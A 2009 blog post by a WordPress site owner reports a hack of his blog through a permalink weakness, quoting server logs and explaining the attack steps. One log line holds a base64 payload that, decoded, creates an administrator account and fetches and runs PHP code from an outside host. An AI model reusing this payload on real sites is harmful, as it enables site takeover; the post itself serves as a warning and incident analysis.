If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.
You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.
I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.
Hopefully WordPress will issue a fix for this soon- in the mean time, keep an eye on your URLs, WordPress bloggers!
UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.
UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.
I’ve included some extracts from my server logs and further thoughts below…
Here are the “smoking gun” entries from my log files:
220.127.116.11 – – [03/Sep/2009:19:16:45 -0700] “GET /wp-login.php HTTP/1.1” 200 907 “https://www.kgadams.net/” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:18.104.22.168) Gecko/20071127”
22.214.171.124 – – [03/Sep/2009:19:16:47 -0700] “POST /wp-login.php HTTP/1.1” 302 20 “https://www.kgadams.net/wp-login.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:126.96.36.199) Gecko/20071127”
188.8.131.52 – – [03/Sep/2009:19:16:50 -0700] “GET /wp-admin/ HTTP/1.1” 200 8117 “https://www.kgadams.net/wp-login.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:184.108.40.206) Gecko/20071127”
220.127.116.11 – – [03/Sep/2009:19:16:52 -0700] “GET /wp-admin//options-permalink.php HTTP/1.1” 200 4145 “https://www.kgadams.net/wp-admin//options-permalink.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:18.104.22.168) Gecko/20071127”
22.214.171.124 – – [03/Sep/2009:19:16:55 -0700] “POST /wp-admin//options-permalink.php HTTP/1.1” 200 4230 “https://www.kgadams.net/wp-admin//options-permalink.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:126.96.36.199) Gecko/20071127”
188.8.131.52 – – [03/Sep/2009:19:16:57 -0700] “POST /xmlrpc.php HTTP/1.1” 403 521 “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdMYXphcm9LaW1tb25zODUnOyR1c2VyX3Bhc3M9JzJtZXprYVRUZG1WcCc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:184.108.40.206) Gecko/20071127”
I don’t have details of what the user at IP address ‘220.127.116.11’ (registered in Latin America) was doing with the first three actions calling wp-login.php, but I’m guessing creating a normal subscriber ID and logging in. Action #4 and #5 above, the call to /wp-admin//options-permalink.php (note the double “//”) is where the permalink was changed. The revised permalink includes an ‘eval’ statement- that executes (runs as a program) what follows, which is a base 64 decode of the referrer string.
The final step is an attempt to use xmlrpc.php to execute the encoded string. The encoded string, decoded, looks like this:
What this is doing is setting a few PHP variables then executing the code retrieved from http://links.webwordpress.cn/data/shortpart2.txt. That little bit of code creates the administrative user and, from what I understand, hides it.
In the case of my site, the hacked permalink seems to have been blocked- I’m not sure whether by BadBehavior or something else I have installed. So the hack was half-successful: the permalink was installed, but using the permalink generated an error.